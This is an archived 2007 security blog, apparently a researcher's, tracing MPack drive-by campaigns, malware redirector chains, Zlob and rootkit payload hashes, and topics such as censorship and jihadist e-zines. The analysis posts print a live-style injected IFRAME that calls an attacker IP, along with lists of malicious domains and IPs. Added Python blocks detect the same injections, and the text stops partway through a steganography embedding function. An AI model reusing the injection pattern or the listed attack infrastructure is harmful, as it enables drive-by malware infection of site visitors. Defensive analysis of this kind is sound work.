Friday, June 29, 2007

Exploits Serving Domains - Part Two

The saying goes that there's no such thing as a free lunch, so let me expand it - there's no such thing as free pr0n, unless you don't count a malware infection as the price. What follows is a demonstration of the Zlob trojan in action, occurring through the usual redirectors, and here's a related article emphasizing the IFRAME-embedded pr0n sites directing traffic to the redirectors :


"Right now, we are not sure whether the porn sites are compromised to host the IFRAMES, are created to do so or are being paid to host the IFRAMES," acknowledged Trend Micro. The attack probably began June 17, the company said. Other researchers have continued to dig into the Mpack-based attacks and have shared some of their findings. Symantec Corp., for instance, asked how hackers were able to infect so many sites in such a short time and how they could inject the necessary IFRAMES code -- the malicious code they added to the legitimate sites' HTML that redirected visitors to the Mpack server -- so quickly."

Psst - they are hosting the IFRAMES; whether they were compromised or are taking an equal share of the revenue among the parties is a question for another discussion. The attack is quite widespread at the time of blogging, check for yourself to get a full listing of all the IFRAME-ed pr0n sites in question. Let's dissect the central hosting locations where all the other sites ultimately lead.

At miss-krista.info - 66.230.171.36 - we have an IFRAME pointing us to todaysfreevideo.com/ad/6811214.html - 81.0.250.239 - where we are offered two pr0n videos to download, todaysfreevideo.com/teens/mr-tp01-2g2s1/1/movie1.php and todaysfreevideo.com/teens/mr-tp01-2g2s1/1/movie2.php, but the actual malware is hosted at an internal page at downloadvax.com - 85.255.118.180 -- and while as usual we get a 403 Forbidden at the main index, within the domain the pr0n surfer gets infected with the Zlob Trojan.

File size: 70853 bytes
MD5: 009ca25402ee7994977f706b96383af0
SHA1: ab60ecefcf27420a57febd5c8decc5c9f34f0e74
packers: BINARYRES

Obviously, unsafe pr0n surfing leads to malware-transmitted diseases, but why call these exploit serving domains when no vulnerabilities get exploited at these URLs? Mainly because miss-krista.info is part of the exploits hosting domain farm I discussed in part one.

Thursday, June 28, 2007

Post a Crime Online

In exactly the same fashion as Chicago's Crime Database, a community-powered site integrating crime reports on Google Maps, Postacrime.com aims to empower police officers with citizen-submitted crimes in progress :

"POSTACRIME.COM is a free service for anyone to upload photo or video content of burglary, theft, vandalism, or other criminal acts that have been caught on camera for the purpose of identification by the public. Often times Law Enforcement is unable to apprehend criminals, even if with the best video evidence, because no one is able to identify the criminal caught on camera. POSTACRIME.COM hopes to change that."

If the site reaches YouTube's popularity by disintermediating the police forces' ongoing investigative efforts, it could also act as an early warning system for the criminals themselves, especially prompting them to change areas of operation. The site is pitching itself as the World's Largest Crime Prevention Network, a bold vision, despite that I find it to be an infomediary categorizing user-submitted crimes and hoping the publicity will help identify the criminal and hopefully recover the stolen goods -- you wish. You cannot prevent crime Web 2.0 style, at least not in this way; you can aggregate publicly available crime data and present a (heat) map of a certain location at a specific time for trend analysis.

Wednesday, June 27, 2007

Exploits Serving Domains

More cyber leads from the previous analysis of the Mpack-embedded dekalab.info, this time with a particular emphasis on a malicious domains farm. Multiple redirectors, blackhat SEO, XOR-ifying javascript obfuscation and a rootkit installed at the end, pretty much everything's in place as usual. The majority of the redirectors are part of an exploit serving domains farm. The whole process starts from trancer.biz :

trancer.biz/sys/index.php
81.95.149.176
HTTP/1.1 302 Found
Server: nginx/0.5.17
Date: Tue, 26 Jun 2007 11:51:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: cawajanga.biz/ts/in.cgi?oscorp

HTTP/1.1 302 Found
Server: nginx/0.5.17
Date: Tue, 26 Jun 2007 11:51:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: blooded.biz/2103/index.php

Then we get redirected to blooded.biz's obfuscated payload at 81.95.149.176, in between loading cawajanga.biz/ts/in.cgi?oscorp and mobi-info.ru, where the deobfuscated XOR-ifying javascript leads us to the exact payload location, the output of which comes in the form of Rootkit.Win32.Agent.fb
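The redirect chain above, walked programmatically: an added example (not code from the original post) that parses a pasted capture of the 302 responses quoted above into a hop list and the distinct hosts a defender would feed to a blocklist. The capture is the post's own two responses, the host names are as given there, and nothing is fetched from the network.

```python
import re
from typing import Dict, List

# Constructed sample: the two 302 responses from the trancer.biz chain quoted in
# the post, pasted as captured text. Nothing is fetched from the network here.
CAPTURED_RESPONSES = """\
HTTP/1.1 302 Found
Server: nginx/0.5.17
Date: Tue, 26 Jun 2007 11:51:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: cawajanga.biz/ts/in.cgi?oscorp

HTTP/1.1 302 Found
Server: nginx/0.5.17
Date: Tue, 26 Jun 2007 11:51:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: blooded.biz/2103/index.php
"""

STATUS_LINE = re.compile(r"^HTTP/\d\.\d\s+(\d{3})(?:\s+(.*))?$")


def parse_responses(capture: str) -> List[Dict]:
    """Split a pasted capture into one record per HTTP response.

    Responses are separated by a blank line, as in the post. Each record holds
    the numeric status and a dict of lower-cased header names to values; blocks
    that do not start with a status line (IP notes, comments) are skipped.
    """
    records = []
    for block in re.split(r"\n\s*\n", capture.strip()):
        lines = block.strip().splitlines()
        match = STATUS_LINE.match(lines[0].strip())
        if not match:
            continue
        headers = {}
        for line in lines[1:]:
            if ":" not in line:
                continue
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
        records.append({"status": int(match.group(1)), "headers": headers})
    return records


def redirect_chain(start: str, records: List[Dict]) -> List[str]:
    """Follow Location headers through consecutive 3xx responses.

    Stops at the first non-redirect, at a missing Location header, or at a
    hop already visited (a loop guard, so a chain that bounces between
    redirectors cannot run forever).
    """
    hops = [start]
    for rec in records:
        if not 300 <= rec["status"] < 400:
            break
        target = rec["headers"].get("location")
        if target is None or target in hops:
            break
        hops.append(target)
    return hops


def chain_hosts(hops: List[str]) -> List[str]:
    """Distinct host names touched by the chain, in order: the list a defender
    would feed to a proxy blocklist or a DNS sinkhole."""
    hosts = []
    for hop in hops:
        host = hop.split("://", 1)[-1].split("/", 1)[0].split("?", 1)[0]
        if host and host not in hosts:
            hosts.append(host)
    return hosts


if __name__ == "__main__":
    chain = redirect_chain("trancer.biz/sys/index.php",
                           parse_responses(CAPTURED_RESPONSES))
    print(" -> ".join(chain))
    print("hosts:", ", ".join(chain_hosts(chain)))
```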

File size: 7503 bytes
MD5: 09994afd14b189697a039937f05f440f
SHA1: b9832689aa1272f39959087df41cea13fc283910

Tuesday, June 26, 2007

Early Warning Security Event Systems

Years ago, early warning systems for security events used to be a proprietary service available to a vendor's customers only, or even worse, to the vendors themselves. But with more vendors realizing the marketing potential behind viral marketing, and the need for more transparency on the state of Internet attacks, nowadays such EWS's are either publicly available at a vendor's site, or accessible due to the emerging CERT-ization and aggregation of honeypot data on a country level courtesy of the local CERTs themselves. And such is the case with ARAKIS :

"an early warning system operated by CERT Polska. ARAKIS aggregates and correlates data from various sources, including honeypots, darknets, firewalls and antivirus systems in order to detect new threats. The dashboard provides a snapshot of activity on the Internet based on data gathered from a selected group of sensors."

PING sweeps dominate the local threatscape? As always, nobody likes shooting into the dark unless of course they really have to. Several more publicly available early warning systems for security events worth considering are :

ATLAS: Active Threat Level Analysis System
CipherTrust's Real-Time PC Zombie Statistics
WatchGuard's Real-Time Spam Outbreak Monitor
ProjectHoneypot's Spam Harvesting Statistics

as well as several malware outbreaks related early warning systems:

Trend Micro's Virus Map
F-Secure's World Map
PandaSoftware's Virus Map
McAfee's Virus Map

As far as any other non IT security incident on a worldwide scale is concerned, the Global Map of Security and Terrorist Events maps the "big picture".

The syndication of such publicly available data into a central dashboard is nothing new, but with so many CERTs in Europe the next big milestone to be achieved should be to first integrate the data between themselves, share with vendors and vice versa, and then communicate the big picture for industry insiders and outsiders to see. An effort which could really undermine the commercial EW systems, ones whose business model is getting outdated with every day.

The FBI's recent "Operation Bot Roast" not only reminds me of the Wardriving Police who will wardrive and leave you flyers that you're vulnerable, but also that when proactive measures cannot take place post-event ones dominate - "Dude, you're malware-infected and sending spam and phishing emails to yourself!" - not exactly what pragmatic is all about :

"OPERATION BOT ROAST is a national initiative and ongoing investigations have identified over 1 million victim computer IP addresses. The FBI is working with our industry partners, including the CERT Coordination Center at Carnegie Mellon University, to notify the victim owners of the computers."

One thing I've learnt about end users: either educate them and evaluate the results, or directly enforce practices, leaving them with no other option but to stay secure by default. Most importantly, the major U.S.-based ISPs sending out spam, and thus having the largest proportion of infected customers, are publicly known. So instead of giving out anti virus tips, cooperate with the ISPs on the concept of filtering outgoing spam messages and DDoS attacks.

With malicious economies of scale, that is botnet masters automating the entire process of exploiting unpatched PCs, using old-school social engineering attacks taking advantage of opened-up "event windows", and packing and crypting their malware to exploit the flaws in the current signature-based detection hype - is such an initiative really worth it? Time will show, but what could follow are fake FBI emails telling everyone that they're infected, with a little something about the operation itself, and how visiting a certain malware-embedded web site will disinfect your PC, the way we've seen it happen before.

Monday, June 25, 2007

Cell Phone Stalking

Six year olds install hardware keyloggers at the U.K's Parliament, and now, as you can hear in the sweet sixteen's voice in this video, they also know how to take advantage of commercially available cell phone snooping services such as Flexispy, for instance :


"Just ask Tim Kuykendall, whose cell phone provided a portal through which a hacker gained access to the most intimate details of his life, recording family members' conversations and snapping pictures of what they were wearing. “We’ve had [times] where I’m having a conversation in my home and I get a voice mail and the conversation’s replayed; received a phone call or even checked my voice mail from a message and while I push 'OK' to listen to [it] I’m hearing a conversation going on in the living room between my daughter and my wife,” he told FOX News."

The successful surveillance, however, doesn't make him a hacker, rather a customer of a product, but what's worth considering is how he managed to infect their cell phones in the first place, namely by socially engineering them remotely, or by physically infecting the mobile device. Meanwhile, Flexispy is continuing its compatibility efforts among popular Symbian, Symbian 9, Windows Mobile, and BlackBerry devices, aiming to strengthen its position as a mobile device activity monitoring solution for some, and a cell phone stalking service for others -- two-sided copywriting messages aim to convince those who might otherwise be opposed to the idea.

Friday, June 22, 2007

The MPack Kit Attack on Video

Video demonstration of MPack courtesy of Symantec goes through various infected sites and showcases the consequences of visiting them : "This video demonstrates how a system is compromised by a malicious IFRAME and how the MPack gang has accomplished this on literally thousands of websites (mostly Italian) through usage of an IFRAME manager tool."



Meanwhile, dekalab.info is yet another malicious URL exploiting MDAC ActiveX code execution (CVE-2006-0003) for you to analyze, among the many already patched vulnerabilities used in the latest version of Mpack. The question remains - how many zero days are currently exploited in the wild through the MPack kit? The "best" is yet to come, paying attention to the periodical new supply of loaders -- 58.65.239.180 got last updated Date: Thu, 21 Jun 2007 22:02:08 GMT -- indicates commitment.


Input URL: dekalab.info
Responding IP: 203.121.78.127
203.121.64.0 - 203.121.127.255
TIME Telecommunications Sdn Bhd

Interestingly enough, the original source of the IFRAME attack 58.65.239.180 remains active, still acting as a redirector to 64.62.137.149/~edit/ which is again an exploit embedded page generated with the MPack kit :

- 58.65.239.180
58.65.232.0 - 58.65.239.255
HostFresh

- alpha.nyy-web.com (64.62.137.149)
64.62.128.0 - 64.62.255.255
Hurricane Electric

Evasive malware-embedded attacks are aiming to improve their chances of not getting detected. If your browser cannot be exploited, all you will see at these IPs/URLs is a :[ sign; the rest is the obfuscated javascript attack you can see in the screenshot. Here's the deobfuscated reality as well. Periodically monitoring these IPs will yield a great deal of undetected malware variants. AVs detecting the current payload :

eTrust-Vet - Win32/Chepvil!generic

File size: 7283 bytes
MD5: ae4e60d99ec198c805abdf29e735f1a7
SHA1: b0d1b68460683d98302636ab16a0eaa4b579397d

Aruba.it's comments on the case as well. Now, let's move on, shall we?

A Blacklist of Chinese Spammers

With China no longer feeling proud of its position in the top 3 main sources of spam on a worldwide basis, the country is going a step beyond the bureaucratic measure to fight spam by licensing email servers undertaken back in April, 2006, and has recently launched a blacklist of Chinese spammers :


"The comprehensive anti-spam processing platform (http://www.iscbl.anti-spam.cn/) will post a regularly updated blacklist of spam servers, allowing telecom operators and mail service providers to access the information. Over 100,000 IP addresses have been blacklisted thanks to public reports, said Zhao Zhiguo, vice-director of the telecommunications department of the Ministry of Information Industry. A "white list" of mail service providers will also be posted on the website, boosting the development of lawful mail service providers, such as the country's big players Sina, 163 and Sohu. ISC Secretary-General Huang Chengqing said the website will gradually open to the public and businesses to accelerate anti-spam efforts domestically and internationally."

And although major blacklist providers have been offering such lists for years, China's inside-towards-outside approach is a great example of the most effective, yet not so popular, approach of dedicating more effort to filtering outgoing spam, compared to the current approach of filtering incoming spam. Only if responsibility is forwarded to the ISPs doing nothing to filter outgoing spam -- who will later on offer you free spam protection to differentiate their USP -- can we start seeing results. 7h3 r3$t i$ a cat and mouse game, and an overall decline in the confidence and reliability of email communications.

World spamming map courtesy of Postini.

Thursday, June 21, 2007

A List of Terrorists' Blogs

Following previous posts "Full List of Hezbollah's Internet Sites", and "Hezbollah's DNS Service Providers from 1998 to 2006", here's a list of terrorist/jihadist related blogs hosted at Wordpress.com, spreading propaganda, violent videos, and yes, glorifying terrorism. The raw content is fascinating, and the main idea behind these multilingual propaganda translations is to wage a "battle of ideas".

The list and associated analyses :


Keywords density:
you 531
allah 493
their 381
they 312
them 306
which 278
we 269
his 266
not 253
have 251


Keywords density:
die 389
der 374
von 215
ist 187
sie 175
den 163
zu 161
das 143
dass 136
es 129


Keywords density:
he 33
his 25
we 25
they 23
allah 23
news 23
shaykh 17
people 16
wa 16
fighting 14


Keywords density:
he 186
his 147
not 124
allah 122
him 106
they 104
them 82
one 73
you 69
their 66

The following are no longer updated :

Here are some more worth going through or crawling :

As always these are just the tip of the iceberg, but yet another clear indication of the digitalization of jihad.

MANPADS and Terrorism

Can terrorist entities easily obtain shoulder-launched surface-to-air missiles, and how are they achieving it? How is sensitive military technology leaking into the hands of those supposedly not in a position to take down modern aircraft? Has the overall shift of the discussion towards shedding more light on the guerrilla-type asymmetric dominance terrorists have excluded the real discussion of how MANPADS and night-vision-equipped fighters take lives on a daily basis in the very sense of conventional warfare?

FAS analyst Matt Schroeder tries to answer these questions in a recently released publication entitled "Global efforts to control MANPADS" :

"Preventing the acquisition and use of man-portable air defence systems (MANPADS) by terrorists and rebel groups has been a matter of concern since the early 1970s. However, despite the persistence of the threat MANPADS pose to aviation, it was the 2002 al-Qaeda attack on an Israeli civilian aircraft flying out of Mombassa, Kenya, that focused world attention on the issue. This introductory section continues by providing some basic information on the development and main types of MANPADS and their capabilities. Section II of this appendix gives an overview of the main threats posed by the weapon. Section III reviews efforts to control the weapon prior to the Mombassa attack, and section IV examines contemporary counter-MANPADS efforts. Section V presents some concluding observations and recommendations for further action."

Export controls, stockpile destruction, physical security and stockpile management practices, buy-back programmes, and active defence measures: airports and airliners are among the key topics discussed. Here's a related post on the topic "Video Shows Somali Insurgent with Sophisticated SA-18 Missile" as well.

Images courtesy of a MANPADS related article in the second issue of the Technical Mujahid E-zine.

Wednesday, June 20, 2007

Massive Embedded Web Attack in Italy

The Web is abuzz with news stories regarding the MPACK web exploitation kit installed on over 10,000 mostly Italian based sites, and in the spirit of previous analyses of malicious URLs here's an overview of the strategy of the attack, the outcome, and the IPs in question, thus the ones that should get blacklisted or have CYBERINT applied for further juicy details on the severity of the attack.

The strategy of the attack
Picture yourself in the position of a malicious attacker wanting to infect the highest number of PCs possible in the shortest timeframe. How would you go about infecting the highest possible proportion of internet surfers using outdated software, ones still living in the "don't open .exe attachments" self-vigilance world? You'd either figure out a way to exploit vulnerabilities within a huge number of web sites and automatically embed the malicious payload, or breach a shared hosting provider and infect all of its customers, thus potentially infecting all of their future visitors. Which is exactly what happened in the most recent case of what's turning into a massive epidemic of MPACK embedded sites.

The outcome of the attack
- Over 10,000 sites affected according to WebSense
- Hundreds of thousands of PCs currently infected according to obtained MPACK statistics
- The majority of infected PCs are located in Italy, given the breach of the shared hosting provider Aruba

Dissecting the attack
It all started when popular Italian sites had the following IFRAME embedded within their front pages :

<iframe name='StatPage' src='hllp://58.65.239.180/' width=5 height=5></iframe>
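A detector for the injection pattern shown in the tag above, added here as an example and not code from the original post: it flags iframes that are both tiny and off-site, or whose src host is a bare IP address. The sample page and the site host www.example.it are constructed for the example; "hllp" is the post's own defanging and nothing is fetched.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlparse

# Constructed sample page: a benign front page carrying the injected StatPage
# tag from the post. "hllp" is the post's own defanging of "http"; nothing is
# fetched. The site's own host name (www.example.it) is made up for the example.
SAMPLE_HTML = """
<html><body>
<h1>Benvenuti</h1>
<iframe src="/widgets/news.html" width="400" height="300"></iframe>
<iframe name='StatPage' src='hllp://58.65.239.180/' width=5 height=5></iframe>
</body></html>
"""

TINY_PX = 10  # a frame this small (or smaller) is effectively invisible to the visitor
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def _pixels(value):
    """'5' or '5px' -> 5; anything else (missing, '100%') -> None."""
    if value is None:
        return None
    match = re.match(r"^\s*(\d+)\s*(?:px)?\s*$", value)
    return int(match.group(1)) if match else None


class IframeCollector(HTMLParser):
    """Collects the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.frames: List[Dict] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.frames.append(dict(attrs))


def find_suspicious_iframes(html: str, site_host: str) -> List[Dict]:
    """Flag iframes matching the injection pattern: a tiny frame whose src is
    off-site, or whose src host is a bare IPv4 address. Returns one finding per
    flagged frame with the src, the host and the reasons that fired."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for frame in collector.frames:
        src = frame.get("src") or ""
        # normalise the defanged scheme so urlparse yields a host name
        host = urlparse(src.replace("hllp://", "http://")).hostname or ""
        width, height = _pixels(frame.get("width")), _pixels(frame.get("height"))
        tiny = (width is not None and height is not None
                and width <= TINY_PX and height <= TINY_PX)
        offsite = bool(host) and host.lower() != site_host.lower()
        reasons = []
        if tiny and offsite:
            reasons.append("tiny-offsite")
        if IPV4.match(host):
            reasons.append("ip-host")
        if reasons:
            findings.append({"src": src, "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_iframes(SAMPLE_HTML, "www.example.it"):
        print(finding)
```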

The entire attack is currently orbiting around the following IPs :


Input URL: 58.65.239.180
Effective URL: hllp://truman.dnspathing.com/suspended.page/
Responding IP: 64.38.33.10
HTTP/1.1 302 Moved Temporarily
Server: nginx/0.5.17
Date: Tue, 19 Jun 2007 22:56:01 GMT
Content-Type: text/html
Content-Length: 161
Connection: keep-alive
Location: hllp://64.38.33.13/~ftpcom/

More coverage :
ISC, Symantec, WebSense, TrendMicro, Finjan -- great to see they came across my analysis of ms-counter.com as well -- PandaLabs.

UPDATE:

MPACK's Builder Screenshot courtesy of Symantec. Meanwhile, here are the exploits available in the latest 0.90 release of the web exploitation kit :

- modified MS06-014
- MS06-006 Firefox 1.5.x Opera 7.x
- 0day Win2000 (ms06-044)
- XML overflow under XP2k3
- WebViewFolderIcon overflow
- WinZip ActiveX overflow
- QuickTime overflow
- ANI overflow

The majority of news articles I came across are emphasizing that the kit is available for sale at $1000. True, but only if you're purchasing it from the original source; the kit has been a commodity for quite a while, with different propositions modifying the source code and selling it for much less, even bargaining with it in case someone's interested in the related underground services offered.

Even more ironic in the case of this particular attack is that while performing the cyber forensics part, I came across another malicious site farm hosting dialers courtesy of CARPEDIEM. And while the IFRAME part of the massive embedded Italy-based attack was gone at the time of checking the dialers, even previous instances of CoolWebSearch were still in place. The second malicious campaign is run via sv2.biz, campaign id = 15682, with all the p0rn sites at 193.110.146.69, which is hosting all the dialer-embedded sites in question. From another perspective, the benefit of infecting a web site farm run on a single IP, with probably hundreds of thousands of visitors, in the shortest timeframe possible has a major flaw: blocking 192.110.146.69 aka CARPEDIEM, which as a matter of fact is listed by Google as a harmful site, will temporarily mitigate the threat.

Initiating traceback of a site that's participating in two malicious campaigns :

1 -> hllp://www.dojinshi.biz/dojin/
Responding IP: 62.149.130.37

2 -> Sites spreading the dialers within :

hllp://www.analream.com/index.html?id=15682
Responding IP: 193.110.146.69

Dynamics of infection :

basically, the host name is identical to that of the distributed .exe :

var My_Param = {};
My_Param['rf'] = "AnalReamV2KTU";
My_Param['id_produit'] = 550;
My_Param['id_site'] = 995;
My_Param['synergie'] = 'h';
My_Param['color'] = 'fire';
My_Param['name_kit'] = "AnalReam.exe";

Here's the entire campaign list :


Situational awareness at its best is what truly matters at the bottom line.

Monday, June 18, 2007

Israeli Reconnaissance Satellite C&C - Video

Catchy demo of a C&C center in Israel, via Cryptome. A violation of OPSEC? Not necessarily, given that some of the synchronized displays are blurred, but the main purpose behind the clip is to communicate that - "yes, our IMINT is powerful enough". Some of the most recent satellite reconnaissance developments are a great example of the utopian tracking of non-existing terrorists' physical assets, such as boats in this case, even white horses in Afghanistan.

"The ocean-surveillance satellites, part of the National Ocean Surveillance System (NOSS), will track possible terrorist activities at sea. The two satellites will fly in a regimented formation within their elliptical orbits above the Earth so that they will be able to precisely determine the positions of ocean-going vessels at different times. This data will be combined with data from 18 other NRO satellites orbiting the Earth, which are spaced apart at six or seven different sections above the Earth’s surface."

And while the U.S is investing in satellite reconnaissance without any "fog of war", an enviable effort, but a highly ineffective one when it comes to fighting terrorism, Japan, which is still heavily relying on the U.S sharing its reconnaissance satellites' data, is facing criticism for not registering some of its spy satellites, a common practice among many other nations :

"Tokyo has been operating spy satellites for four years that have not been registered with the United Nations, despite having signed an international treaty that requires it to report them. The Convention on Registration of Objects launched into Outer Space, adopted in 1974 and proclaimed in 1976, required signatories to identify the artificial satellites and other objects they put in space. Japan signed that treaty in 1983. Treaty violations are not subject to punishment."

precisely the type of possible pre-launch information leakage I pointed out in a previous post on stealth satellites :

"You can't hijack, intercept or hide from what you don't see or don't know it's there, and stealthy satellites are going to get even more attention in the ongoing weaponization of space and the emerging space warfare arms race. Here's a huge compilation of articles and news items related to the development of stealthy satellites."

A pre-launch leak in today's OSINT world is the worst enemy of the concept of stealth satellites. Here's an in-depth assessment of China's anti-satellite programs worth going through as well.

Related posts:
Satellite Imagery of Secret or Sensitive Locations
U.K's Latest Military Satellite System
The History and Future of U.S. Military Satellite Communication Systems
China Targeting U.S Satellite - Laser Ranging or Demonstration of Power?
Open Source North Korean IMINT Reloaded
Iran Bans Purchase of Foreign Satellite Data

Tuesday, June 12, 2007

DIY Malware Droppers in the Wild

The revenge of the script kiddies, or the master minds releasing DIY tools to let 'em generate enough noise as I've pointed out in my future trends of malware paper? Further expanding the Malicious Wild West series, here are two more recently released DIY malware droppers. The detection rate for the generated dropper of the first one is disturbing given it's not even crypted :

AVG - 06.12.2007 - Downloader.VB.KK
NOD32v2 - 06.12.2007 - probably unknown NewHeur_PE virus
Panda - 06.12.2007 - Suspicious file

No AV detects the packer itself!

File size: 311296 bytes
MD5: 1944378cba81bcd894d43d71dc5fccb5
SHA1: 920505f2124e8a477ab26a28f81a779d717882be

The second one has a much higher detection rate of both the packer and the dropper :

File size: 19001 bytes
MD5: abad61857c4b79773326496dec11929b
SHA1: 5c74c3572febf7f468b41d9bdc5cbc19eb2348b5

PandaLabs has recently conducted a study on the increasing use of packers and cryptors by malware authors worth mentioning :

"There are many different packers. According to the PandaLabs study, UPX is the most common and is used in 15 percent of the malware detected. PECompact and PE, are used in 10 percent of cases. However, according to PandaLabs, there are more than 500 types of packers that could be used by cyber-crooks. “In essence it is a stealth technique. The increasing use of these programs highlights how keen Internet criminals are for their creations to go undetected,” explains Luis Corrons, technical director of PandaLabs."

You may also be interested in finding out how popular anti virus vendors perform against known, but crypted, malware.

Related posts:
A Malware Cryptor
A Malware Cryptor 2
A Malware Loader

Homosexual Warfare

Applause for the non-lethal weapons R&D, but a Gay Bomb using aphrodisiacs to provoke sexual behaviour on the field courtesy of the Pentagon, is far more creative than a vomit beam for instance :

"In one sentence of the document it was suggested that a strong aphrodisiac could be dropped on enemy troops, ideally one which would also cause "homosexual behaviour". The aphrodisiac weapon was described as "distasteful but completely non-lethal". In its "New Discoveries Needed" section, the document implicitly acknowledges that no such chemicals are actually known."

Just imagine the situation when a century later, a futuristic History Channel displays holograms of such warfare activities. More info on the Gay Bomb, as well as video of soldiers on LSD -- exceptional warriors win their battles without waging wars.

Censoring Flickr in China

Since I've been discussing China's Internet censorship practices, and I've been doing it pretty much since I started blogging, this is the most recent example of how what's thought to be the most robust and sophisticated censorship system in the world is a useless technological solution if not implemented "properly". The news of the government censoring a very popular site will spread faster, but instead of applying the predefined subversive content detection practice and allowing everything else, they're mocking their overhyped censorship system by blocking the entire site instead of either removing the content in question or blocking access to the specific Flickr set. Futile attempt? For sure, but a far more gentle approach to censorship compared to the current one.

Various news sources reported that China's censoring the entire Flickr. As you can see, the greatfirewallofchina.org test confirms the block, but it also confirms that Flickr.com itself is not censored, while any other content within it is. How come? The idea is that the user is left with the impression that it's a technical glitch at Flickr.com, compared to receiving a censorship warning or even a 404 when accessing the main page. Logging in to Flickr is possible -- verified manually through a Beijing based proxy -- uploading is also possible, but no content can be seen.

Flickr = a Yahoo! media company with which the Chinese government has been keeping close ties in the past, so close that jailed journalists started filing lawsuits against Yahoo. Various bloggers speculated that China banned the entire site due to the leak of protestors' photos on it, and taking into consideration China's ongoing censorship of mobile communications such as SMS messages, which I covered in a previous post, you may notice that in the first image the received SMS giving the time and place of the protest is censored by the photographer herself, especially the time of receipt. The protest is also on YouTube, so would YouTube logically be next to get blocked? I doubt it, as basically the protest would position itself as an even higher priority issue for the Chinese government. The censorship trade-off: should you censor it and add more exclusiveness to it, or ignore it and act like it's nothing serious? Undermine censorship by spreading the censored item further.

Even more interesting is the fact that a couple of months ago, Google's shareholders were about to wage a proxy battle in order to convince top management of the long-term effects of censorship. Google convinced them that the revenues streaming from China, with its near-the-top Internet population, are more important, and so they agreed. Obviously, Yahoo's shareholders are, too, not keen on the fact that their investments are driving the oppression of Chinese citizens, and have recently proposed a similar resolution :

"Amnesty International has today (11 June) expressed its support for two shareholder resolutions up for vote at tomorrow's Yahoo! annual meeting in California, one calling on the company to oppose internet repression in countries such as China, and one requesting the creation of a corporate Board Committee on Human Rights."

New media companies are helpless and obliged under Chinese law to censor if they don't want to lose the option to do business in (Soviet) China; therefore nation-2-nation actions must be taken, especially by the world's major evangelists of a free society and democracy. The rest is a twisted reality - a Tiananmen Square image search outside China, and a Tiananmen Square image search in China, everything's "in order".

Thursday, June 07, 2007

An Analysis of the Technical Mujahid - Issue Two

Good afternoon everyone, shall we enjoy some fried cyber jihadists for lunch? I'd say let's go for it. After I analyzed issue one of the Technical Mujahid a couple of months ago, the post continues to be among the most popular ones at this blog, and best of all - I've virtually met people whose knowledge intimacy I'd never ruin by physically meeting with them. In a globalized world, OSINT is your early warning system and a tool for establishing social responsibility as a citizen of the world, and I'm still sticking to my old saying that for every OSINT conducted, a tax payer's buck is saved somewhere.

During March 2007, the Al Fajr Information Center released the second issue of the Technical Mujahid E-zine (72 pages), definite proof of their commitment to educating brainwashing- and radicalization-prone wannabe jihadists. What has improved? Have the topics shifted from general IT ones to start covering conventional weaponry? Disturbingly, yes. Whereas the topics still largely remain IT related, much more PSYOPS and discussion of weapons systems such as MANPADS is included in the second issue. The myth of terrorists and jihadists using steganography is "thankfully" coming out of the dark, however uncomfortable that may make you feel. From a strategic point of view, the lowlifes are putting more effort into educating the average jihadist on how to generate noise, so that the real conversation can continue, with wannabe jihadists getting caught and the true masterminds remaining safe.
Case in point - the first issue of the magazine was covered by several sources who seem to be aware of the forums where the real discussion and announcements are going on, but the release of the second issue wasn't that well covered in comparison to their previous coverage. But how come? Is someone interested in getting a higher proportion of the upcoming departmental budget allocation with stories like "we need petabytes of disk space and CPU on demand to analyze the ongoing conversations", or is the average citizen feeling more secure not knowing how aware both cyber and real-life jihadists are? A picture is sometimes worth a thousand fears. Let's discuss the second issue of the Technical Mujahid by starting with the key summary points:

Key summary points:
- The second issue of the magazine is diversifying its content to include conventional weaponry articles, especially the nasty MANPADS
- Propaganda is largely increasing, thanks to automated translation software and keyword density analysis
- With articles such as the ABC of running and operating a jihadist site online, the authors of the magazine are aiming to generate even more noise
- There's a very experienced team of multimedia/creative designers applying professional layouts to the magazine and the articles

01. Article One - An Overview of Steganography and Covert Communications

Article one is a continuation of the discussion opened in the first issue on the basics of steganography and encryption. Rich in visual material as always, it covers a surprising number of steganographic techniques, starting from watermarking, and also comments on the process of steganalysis and how degrading the quality of, say, an image is a major trade-off compared to encryption. The article also includes a comparison of the color histograms of an original image and a steganographic one to showcase the trade-off. What makes an impression is the evolving editorial and DIY tutorials, with definitions of technical terms and their Arabic translation at the end of each article.

Key terms from article one:

Steganography (Steganos graphy); Steganalysis; Morse Code; Digital Signal and Image Processing; Watermarking; LSB (Least Significant Bit); MSB (Most Significant Bit); Histogram (Frequency distribution of RGB); One Way Encryption; Discrete Cosine Transform (Coefficients); Enhanced LSB Layers Analysis.

Moreover, an example is given where Islamic military communications in Iraq are hidden in a 100x50 pixel picture. Feeling uncomfortable with the idea of jihadists using steganography for communications? So do I, but denying the reality is even worse than admitting it and keeping it realistic. Something else is important to understand as well, and that's the overall lack of situational awareness of the average citizen in any country, still living in the stereotype of a bunch of folks making plans in the sand in a distant cave somewhere in the mountains. Your desire to remain what you are is what limits you.

It's also worth discussing why they are including English-to-Arabic translations of technical terms, and I think the main goal is to provoke readers to start searching the Arabic web for related articles. Perhaps a good moment to break the stereotype and mention that online jihadi communities are where visitors convert to talkers, and later on doers.
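To make the LSB and histogram discussion above concrete from the steganalysis side, here is an added example (my own illustration, not code from the e-zine or from this blog): a random-looking payload is written into the least significant bits of a constructed grayscale cover, the pixels barely change, yet the even/odd histogram pairs the article's before-and-after histograms hint at are flattened enough to be detected with a pairs-of-values chi-square test. The cover image, the payload and all function names are constructed for the demonstration.

```python
import random

def embed_lsb(pixels, payload):
    """Replace the least significant bit of successive pixels with payload bits."""
    bits = [(byte >> i) & 1 for byte in payload for i in range(7, -1, -1)]
    if len(bits) > len(pixels):
        raise ValueError("cover image too small for payload")
    out = list(pixels)
    for idx, bit in enumerate(bits):
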